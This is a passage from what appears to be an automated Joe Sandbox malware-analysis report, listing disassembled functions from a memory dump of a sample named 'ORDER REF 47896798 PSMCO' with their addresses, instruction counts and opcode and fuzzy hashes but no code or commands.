                                                                                            • Opcode Fuzzy Hash: 620701cfd2707a38b7bc757ef4669c82b191dd2b4709046f7549d0c0f09d9564
                                                                                            • Instruction Fuzzy Hash: EB11E8B1E10219AFCB04DFA9D541AAEBBF8FF58250F14406AA905E7351D674EA018BA4
                                                                                            Function 019420F0 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0663d9fca7b071368625471f9ecd1382eefb50217cc5fcf3a296a832e24e728d
                                                                                            • Instruction ID: f557318e8e8d20124f67abf80d379df2bae4b42fddd52a4eb5a5ff0c9c2f7ee0
                                                                                            • Opcode Fuzzy Hash: 0663d9fca7b071368625471f9ecd1382eefb50217cc5fcf3a296a832e24e728d
                                                                                            • Instruction Fuzzy Hash: 85118035A0120DAFDB15EFA4D851FAE7BB9FF88340F104059F90997250E635AE11CB90
                                                                                            Function 018FC020 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                            • Instruction ID: 8505105a462949019b7d18cecb9628951f6f558afe0309ed64f86f3da5d43a84
                                                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                            • Instruction Fuzzy Hash: 6101B5321007099FEB22D6AAC800EA777EDFFC5354F04881DAA4ACB554DB70E643C750
                                                                                            Function 0193E5CF Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 342259a62ea6ec68d8eb6bdd7d1e38e8c7798cd667fb58b99ca6c7b2575e1593
                                                                                            • Instruction ID: d8250d41d7c326103f03c19714251e3d6a5e448e76bb610663a4a5bc8a596b4d
                                                                                            • Opcode Fuzzy Hash: 342259a62ea6ec68d8eb6bdd7d1e38e8c7798cd667fb58b99ca6c7b2575e1593
                                                                                            • Instruction Fuzzy Hash: E5018F71641A1ABBD311BB69CD80E57BBBCFFD5AA4B000629B60D83695DB24EC41C6A0
                                                                                            Function 019969C0 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8bb394419b0d7d534c71bde437fe7d2349fc36bfc76d39e7ab4672b8d3268bbb
                                                                                            • Instruction ID: 285ffe875dfd212512a946df8097562a2fc46c882e09b55d241477e206d60b7a
                                                                                            • Opcode Fuzzy Hash: 8bb394419b0d7d534c71bde437fe7d2349fc36bfc76d39e7ab4672b8d3268bbb
                                                                                            • Instruction Fuzzy Hash: 01014C322152029BC720DF7EC848DA7BBACFF84720F114529E95D87180E7349901C7D1
                                                                                            Function 0198C460 Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1eb39b103fffe70e2a4ebf673d6e68fb0b231692061de54988205c36b16da383
                                                                                            • Instruction ID: 0b96a9294c3b1062f706d676715593a24653ef1d06538679c36c45424a68fba9
                                                                                            • Opcode Fuzzy Hash: 1eb39b103fffe70e2a4ebf673d6e68fb0b231692061de54988205c36b16da383
                                                                                            • Instruction Fuzzy Hash: D8116D75A0120DEBDB15EFA8C840EEE7BB9FB88750F004059FD0597340DA39EA51CBA0
                                                                                            Function 0198C97C Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1db4e97119748ea31175fbbec391df05956fdf42691514cfd6b0cbec7bf6d575
                                                                                            • Instruction ID: c5e2173d35e88a819fef638a186a85555ba42a36f5319ff19b0bf96f52aeb433
                                                                                            • Opcode Fuzzy Hash: 1db4e97119748ea31175fbbec391df05956fdf42691514cfd6b0cbec7bf6d575
                                                                                            • Instruction Fuzzy Hash: B71139B16193099FC700DF69D442A9BBBE8EF98710F00495EB998D7391E670E900CBA6
                                                                                            Function 019D4A80 Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                            • Instruction ID: 32b3da8e7573c45ce274ab52fb93d703c3eee013d56aca895316c786cfc0f954
                                                                                            • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                            • Instruction Fuzzy Hash: 1601FC322006069FDB21DA5DD844F57B7EAFFC5210F048859F64A8BE54DA70F840C755
                                                                                            Function 0198CA11 Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e7171660a373b8b755112c58eb5894638adb2a5b19d7bd1aa3c09de8f1e564c5
                                                                                            • Instruction ID: 35e1fd9e035613f9a0eb0a591c10cd5862d3aa19f66c0dcf69593892c178c4e2
                                                                                            • Opcode Fuzzy Hash: e7171660a373b8b755112c58eb5894638adb2a5b19d7bd1aa3c09de8f1e564c5
                                                                                            • Instruction Fuzzy Hash: 41117C716083089FC300DF69C44199BBBE4FF99350F00451EB998D7350E630E900CBA2
                                                                                            Function 0191E016 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction ID: b10afa4457bee379b150a28d77d633645c09d443099202c3197045f6da0371a1
                                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                            • Instruction Fuzzy Hash: 39015632204688DFE323DA1DC948F267BECEB84B54F0904A1ED09DB6A2D638DC80C621
                                                                                            Function 018F826B Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8aaa36c11e3d6ae4545ebeb4b3fa7af10e16cb1f40b71e9173f271bd8a97a51f
                                                                                            • Instruction ID: 23aa7d376576bcb9c30d9125905d5e24978f328b7c7d04de4b310ae52508665f
                                                                                            • Opcode Fuzzy Hash: 8aaa36c11e3d6ae4545ebeb4b3fa7af10e16cb1f40b71e9173f271bd8a97a51f
                                                                                            • Instruction Fuzzy Hash: 66018435610609AFD714EB69D8049AE77A9EF82324F15402E9B05E7640EE70EA02C791
                                                                                            Function 019AEB50 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 87e3038225ed033c719a5d610b14aa43da30a09cd1311f2fe7ff237d759b9978
                                                                                            • Instruction ID: 43459b99686f64e36337db9f3de302c719b3b78be3f0914b8c3e54a899baf8bd
                                                                                            • Opcode Fuzzy Hash: 87e3038225ed033c719a5d610b14aa43da30a09cd1311f2fe7ff237d759b9978
                                                                                            • Instruction Fuzzy Hash: 7901A771244705AFD3319B16D840F02BAA8EF95B60F11442DB30E9F3A0D6B4A840CB94
                                                                                            Function 01902582 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed0d405ab0270fb3e1df18fd40b7c19d8fb1f54c6b1ae064e6fee9abaab0173c
                                                                                            • Instruction ID: c1764da70e14d3238fe7cb284030e805bdb2b64c236649c081596352bee24dfc
                                                                                            • Opcode Fuzzy Hash: ed0d405ab0270fb3e1df18fd40b7c19d8fb1f54c6b1ae064e6fee9abaab0173c
                                                                                            • Instruction Fuzzy Hash: 1CF0F932A41714BBC732DB568D44F477EADEBC4BA0F114028A60D97640D630ED01C7A0
                                                                                            Function 0192C073 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction ID: 72f77011bba6c85927927e7238189cb5423ecc7128de3fa5b3e417d904ec7ae6
                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction Fuzzy Hash: 04F062B2A00625ABE324CF4DDC40E57FBEEDBD5A90F058129E559D7224EA31ED05CB90
                                                                                            Function 018FC310 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction ID: e5afa28d8956d2a7a26db89f1cb9084f1972f911db482b756bee6fb5d66033f8
                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction Fuzzy Hash: 6EF0FC7320462B9BD732565D8840F2BA595CFD1BE4F1A003DE709DB204CB608F0157D2
                                                                                            Function 019D634F Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2192158592ab0edb88baeb03d08556a5a5a29074b72d1dd3343ae92b0b6c1326
                                                                                            • Instruction ID: 4cd6c7d980f8d414d6cb963d9b94589986888a5108ee11129fccfffb60faa39a
                                                                                            • Opcode Fuzzy Hash: 2192158592ab0edb88baeb03d08556a5a5a29074b72d1dd3343ae92b0b6c1326
                                                                                            • Instruction Fuzzy Hash: F5012C71A10209ABDB04DFA9D551EAEB7F8FF98304F10406AE915E7350DA74DA018BA4
                                                                                            Function 019D62D6 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08c3c8374f0390906ceb681ce053c2459f6ff8c2c8b5bffdfb79961c05a0caff
                                                                                            • Instruction ID: 065afc6e686d19b325cd06df706393a0ef755b01a3d41d302e87ef49cbe27888
                                                                                            • Opcode Fuzzy Hash: 08c3c8374f0390906ceb681ce053c2459f6ff8c2c8b5bffdfb79961c05a0caff
                                                                                            • Instruction Fuzzy Hash: 0A012C71A00209ABDB04DFA9D441EAEBBF8EF58344F50806AE915E7390DA749A018BA4
                                                                                            Function 019D625D Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 190851a2b5b04d1286985983c85902ac03946e112f3e21333390d56f1d943709
                                                                                            • Instruction ID: 16499eeb342bec33cb90365769efb3f2b227b70b9cf03d176f423b27613eb05b
                                                                                            • Opcode Fuzzy Hash: 190851a2b5b04d1286985983c85902ac03946e112f3e21333390d56f1d943709
                                                                                            • Instruction Fuzzy Hash: E2012171A10219ABCB04DFA9D451EAEB7F8EF98304F10805AF915E7351D6749A018BA4
                                                                                            Function 019D61E5 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3dc744d598c3ac431c8d4f02cb332f784003c20d7fb4f61e6e725db509e568d0
                                                                                            • Instruction ID: f491d4ca09f0974244b890d71edf4fc872de2d4dfb25606658ff6d11b2abf2d2
                                                                                            • Opcode Fuzzy Hash: 3dc744d598c3ac431c8d4f02cb332f784003c20d7fb4f61e6e725db509e568d0
                                                                                            • Instruction Fuzzy Hash: 02014F71A01259ABDB04DFA9D445EEEBBF8FF58310F14405EE505E7280D774EA01CB94
                                                                                            Function 019863C0 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction ID: 9c2d63f0b4e4b1edcfcc96cf179060862d9e313ebdc3e56a63bc2b1e6a45787f
                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction Fuzzy Hash: 6EF0127220001DBFEF019F95DD80DAF7B7DEB956D8B104125FA1596160D631DD21A7A0
                                                                                            Function 0198A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 578cf81c1a13726f0d82067ffe4087c11ba87b8db2102d28a45fd9f610045d4e
                                                                                            • Instruction ID: 223a4ee0b10e491b886fe5c4777e2d33b99eda5d0d89244a5e59cd303468d94a
                                                                                            • Opcode Fuzzy Hash: 578cf81c1a13726f0d82067ffe4087c11ba87b8db2102d28a45fd9f610045d4e
                                                                                            • Instruction Fuzzy Hash: 6E018936100149ABCF12AE84D840EDE3F66FB4C664F068116FE1866220C332D9B0EB91
                                                                                            Function 018FC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 600b88d0159b39c255d8591177e1762198a49146ac1460ecff43ef0e128f1df9
                                                                                            • Instruction ID: 39ddaef4a3aaa98d92d8032f085be34752c7ca1a7b609421d6871af69082f1fe
                                                                                            • Opcode Fuzzy Hash: 600b88d0159b39c255d8591177e1762198a49146ac1460ecff43ef0e128f1df9
                                                                                            • Instruction Fuzzy Hash: 58F024712047495BF31496198C01F2233AAE7C0794FA5806EEB09CB2C1FB71EF9183A5
                                                                                            Function 0193656A Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8aa03d9e83f1899394d0f21448208a707c7b11b4a98cf08dd0cca9c1f76e79fe
                                                                                            • Instruction ID: 6f85efb0fbbe8d2cc7504e1c02ea41450c845673f45111cbca43a20ecf804b21
                                                                                            • Opcode Fuzzy Hash: 8aa03d9e83f1899394d0f21448208a707c7b11b4a98cf08dd0cca9c1f76e79fe
                                                                                            • Instruction Fuzzy Hash: 5B014470305685ABF3229B6CCD48F253BE9BF81B45F4905A4BA0D8B6D6D768D941C620
                                                                                            Function 019A437C Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction ID: 9fbe39a7e302b4a97bf57c710aef9dd3faa2360a18a6034a756b59cabfa030c3
                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction Fuzzy Hash: 15F0E93538191347E735AA2E8620B2EBA599FD0A02B4E452C960DCB680DFA0D80C87D0
                                                                                            Function 0198C89D Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f72f91b644b74f24ed0e0765ddcb805af2af15dfe6a4d24ad11dd81af2af21b5
                                                                                            • Instruction ID: 321e38c06b4ac767c8519885981f0758d12f9ebf56272365efa2d7bad62fae85
                                                                                            • Opcode Fuzzy Hash: f72f91b644b74f24ed0e0765ddcb805af2af15dfe6a4d24ad11dd81af2af21b5
                                                                                            • Instruction Fuzzy Hash: C6F0AF716193049FC310EF68C442E1AB7E4FF98710F80465AB898DB394E634EA00CB96
                                                                                            Function 0198E872 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction ID: da5c5973c7a03dd5faac8d6e91d446a48c54c0c52184d7b8f418f8c0f092fff3
                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                            • Instruction Fuzzy Hash: E5F08933B255119BD331AA4DCC90F1AB77CEFD5A60F190465AA0C9B264C760EC41C7D1
                                                                                            Function 01930854 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction ID: 6a779e73a47db5de81d0dcc0ce4fec1019dc53c2031e36a4a7def3fff4f147d0
                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                            • Instruction Fuzzy Hash: 80F02472600204AFE314DF25CC00F46B6E9FFE8300F198078A548C7160FAB1EE00C696
                                                                                            Function 0198C912 Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6782a38cfa7a8f4a5016746b73e4915d5f80dc9504996b1867075cb54444a64
                                                                                            • Instruction ID: b968c4595c2e914204674d3dd57ecdafe82ad311cef42580ff6460e4524020ca
                                                                                            • Opcode Fuzzy Hash: b6782a38cfa7a8f4a5016746b73e4915d5f80dc9504996b1867075cb54444a64
                                                                                            • Instruction Fuzzy Hash: BAF04F70A01249AFCB04EFA9C515E9EB7B4EF58300F108059B959EB385DA74EA01CB64
                                                                                            Function 019047FB Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a978368ba349c6c7f6ff3e3ab5ae44c315acbf0be401a3b31ca0d676649ed010
                                                                                            • Instruction ID: 3ad24bea4305a3ae090745131f0bf882f66f2a5b2813589b1c235d057641e801
                                                                                            • Opcode Fuzzy Hash: a978368ba349c6c7f6ff3e3ab5ae44c315acbf0be401a3b31ca0d676649ed010
                                                                                            • Instruction Fuzzy Hash: CDF090719166D59EE7239B6CC044B21BBD89B00623F088D6ADF4D87582C7A4DA80CA52
                                                                                            Function 019C0115 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e5567eb4fe5b43ae9d47b1cbbe224316a679d2452e6a8c63527a509fdc3f1799
                                                                                            • Instruction ID: 4761bb6990843fee6d63fed51e78eea1319eecfbd40f846b744824b76a726ea2
                                                                                            • Opcode Fuzzy Hash: e5567eb4fe5b43ae9d47b1cbbe224316a679d2452e6a8c63527a509fdc3f1799
                                                                                            • Instruction Fuzzy Hash: 23F0273A41A780A6CF325B2C69A03D5AF58F7C2914F0D104DD4E857205C57885C3C321
                                                                                            Function 0193C5ED Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
